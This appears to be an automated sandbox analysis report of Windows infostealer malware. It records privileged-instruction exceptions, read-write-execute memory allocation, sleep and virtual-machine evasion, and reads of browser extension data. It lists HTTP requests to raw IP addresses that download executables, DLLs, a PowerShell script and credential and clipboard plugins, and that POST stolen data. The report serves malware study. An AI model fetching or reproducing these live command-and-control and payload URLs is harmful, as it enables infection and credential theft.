__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 80 02 00 00 b9 c4 8c 7f 72 e9 b9 fd ff ff exception.symbol: 1n22o8+0x244497 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2376855 exception.address: 0x454497 registers.esp: 2161976 registers.edi: 4537787 registers.eax: 31606 registers.ebp: 3992645652 registers.edx: 1576689607 registers.ebx: 4538535 registers.esi: 4537787 registers.ecx: 34065	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 e9 99 00 00 00 83 c4 04 81 c7 04 00 00 00 exception.symbol: 1n22o8+0x2440fc exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2375932 exception.address: 0x4540fc registers.esp: 2161980 registers.edi: 0 registers.eax: 607947088 registers.ebp: 3992645652 registers.edx: 1576689607 registers.ebx: 4541461 registers.esi: 4537787 registers.ecx: 34065	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 29 c0 e9 d1 00 00 00 59 87 14 24 5c 03 0c 24 exception.symbol: 1n22o8+0x246a0d exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2386445 exception.address: 0x456a0d registers.esp: 2161980 registers.edi: 3992645652 registers.eax: 30257 registers.ebp: 3992645652 registers.edx: 654051297 registers.ebx: 620773380 registers.esi: 4537787 registers.ecx: 4577470	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 51 b9 1a 79 fb 6a exception.symbol: 1n22o8+0x246543 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2385219 exception.address: 0x456543 registers.esp: 2161980 registers.edi: 3992645652 registers.eax: 4294939620 registers.ebp: 3992645652 registers.edx: 2298801283 registers.ebx: 620773380 registers.esi: 4537787 registers.ecx: 4577470	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 55 e9 2b 00 00 00 0d 5a 97 b7 7e 2d 96 6e b9 exception.symbol: 1n22o8+0x25b1ec exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2470380 exception.address: 0x46b1ec registers.esp: 2161976 registers.edi: 4609571 registers.eax: 27346 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1969225702 registers.esi: 4571930 registers.ecx: 4630809	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 04 24 53 bb fb e2 6f 7a 89 d8 5b exception.symbol: 1n22o8+0x25a988 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2468232 exception.address: 0x46a988 registers.esp: 2161980 registers.edi: 4609571 registers.eax: 27346 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1969225702 registers.esi: 4571930 registers.ecx: 4658155	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 52 68 b3 21 43 4d 89 3c 24 e9 c4 02 00 00 89 exception.symbol: 1n22o8+0x25a944 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2468164 exception.address: 0x46a944 registers.esp: 2161980 registers.edi: 4609571 registers.eax: 27346 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 606898514 registers.esi: 0 registers.ecx: 4633503	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 14 b0 b5 7b f7 1c 24 81 34 24 89 exception.symbol: 1n22o8+0x25e3f7 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2483191 exception.address: 0x46e3f7 registers.esp: 2161980 registers.edi: 4673853 registers.eax: 28369 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 1720921475 registers.esi: 0 registers.ecx: 21655681	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 53 54 5b e9 2f 01 00 00 81 c3 01 00 00 00 43 exception.symbol: 1n22o8+0x25e3c5 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2483141 exception.address: 0x46e3c5 registers.esp: 2161980 registers.edi: 4648193 registers.eax: 28369 registers.ebp: 3992645652 registers.edx: 0 registers.ebx: 98601296 registers.esi: 0 registers.ecx: 21655681	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 50 68 23 68 1f 67 58 e9 b0 ff ff ff ff 34 24 exception.symbol: 1n22o8+0x26b673 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2537075 exception.address: 0x47b673 registers.esp: 2161980 registers.edi: 4687834 registers.eax: 30847 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 4730228 registers.esi: 88616640 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 53 e9 18 04 00 00 31 e9 e9 14 fe ff ff 53 e9 exception.symbol: 1n22o8+0x26b834 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2537524 exception.address: 0x47b834 registers.esp: 2161980 registers.edi: 4687834 registers.eax: 30847 registers.ebp: 3992645652 registers.edx: 912362088 registers.ebx: 4702192 registers.esi: 88616640 registers.ecx: 0	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb 56 81 ec 04 00 00 00 89 14 24 ba 5b be 7e 7b exception.symbol: 1n22o8+0x278db9 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2592185 exception.address: 0x488db9 registers.esp: 2161976 registers.edi: 46609644 registers.eax: 31550 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 4754612 registers.esi: 46645228 registers.ecx: 1404960768	1
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: fb e9 71 fc ff ff ba 0a 15 9f 7f bf 96 59 b9 96 exception.symbol: 1n22o8+0x279299 exception.instruction: sti exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2593433 exception.address: 0x489299 registers.esp: 2161980 registers.edi: 46609644 registers.eax: 31550 registers.ebp: 3992645652 registers.edx: 2130566132 registers.ebx: 4786162 registers.esi: 46645228 registers.ecx: 1404960768	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (27 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://45.93.20.28/85a1cacf11314eb8.php
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://176.113.115.6/Ni9kiput/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7868598855/zY9sqWs.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.125.50.8/mVsXkjvb3/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7212159662/HmngBpR.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/5419477542/ADFoyxP.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/8032894631/9hUDDVk.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/5153162918/pwHxMTy.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/6491397189/T0QdO0l.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.16/test/amnew.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/5526411762/yUI6F6C.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.209/Di0Her478/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/5526411762/CgmaT61.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/2043702969/9zQZD2e.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.7/files/6691015685/V0Bt74c.exe

Performs some HTTP requests (27 events)

request	GET http://45.93.20.28/
request	POST http://45.93.20.28/85a1cacf11314eb8.php
request	POST http://176.113.115.6/Ni9kiput/index.php
request	GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll
request	GET http://176.113.115.7/files/7868598855/zY9sqWs.exe
request	GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll
request	GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll
request	POST http://185.125.50.8/mVsXkjvb3/index.php
request	GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe
request	GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll
request	GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll
request	GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll
request	GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll
request	GET http://176.113.115.7/files/7212159662/HmngBpR.exe
request	GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll
request	GET http://176.113.115.7/files/5419477542/ADFoyxP.exe
request	GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll
request	GET http://176.113.115.7/files/8032894631/9hUDDVk.exe
request	GET http://176.113.115.7/files/5153162918/pwHxMTy.exe
request	GET http://176.113.115.7/files/6491397189/T0QdO0l.exe
request	GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1
request	GET http://185.215.113.16/test/amnew.exe
request	GET http://176.113.115.7/files/5526411762/yUI6F6C.exe
request	POST http://185.215.113.209/Di0Her478/index.php
request	GET http://176.113.115.7/files/5526411762/CgmaT61.exe
request	GET http://176.113.115.7/files/2043702969/9zQZD2e.exe
request	GET http://176.113.115.7/files/6691015685/V0Bt74c.exe

Sends data using the HTTP POST Method (4 events)

request	POST http://45.93.20.28/85a1cacf11314eb8.php
request	POST http://176.113.115.6/Ni9kiput/index.php
request	POST http://185.125.50.8/mVsXkjvb3/index.php
request	POST http://185.215.113.209/Di0Her478/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 720 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 724 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fb1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e81000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x756e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00211000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04060000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04070000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04390000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x044e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x044f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04620000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x048f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04910000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x043a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73dc1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x051a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 8, 2025, 12:08 p.m.	process_identifier: 2356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (3 events)

description	Gxtuum.exe tried to sleep 182 seconds, actually delayed analysis time by 182 seconds
description	rapes.exe tried to sleep 1181 seconds, actually delayed analysis time by 1181 seconds
description	3H65J.exe tried to sleep 178 seconds, actually delayed analysis time by 178 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW March 8, 2025, 12:08 p.m.	number_of_free_clusters: 2423665 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 8, 2025, 12:08 p.m.	number_of_free_clusters: 2423665 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 8, 2025, 12:08 p.m.	number_of_free_clusters: 2422313 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW March 8, 2025, 12:08 p.m.	number_of_free_clusters: 2422313 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (50 out of 5858 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
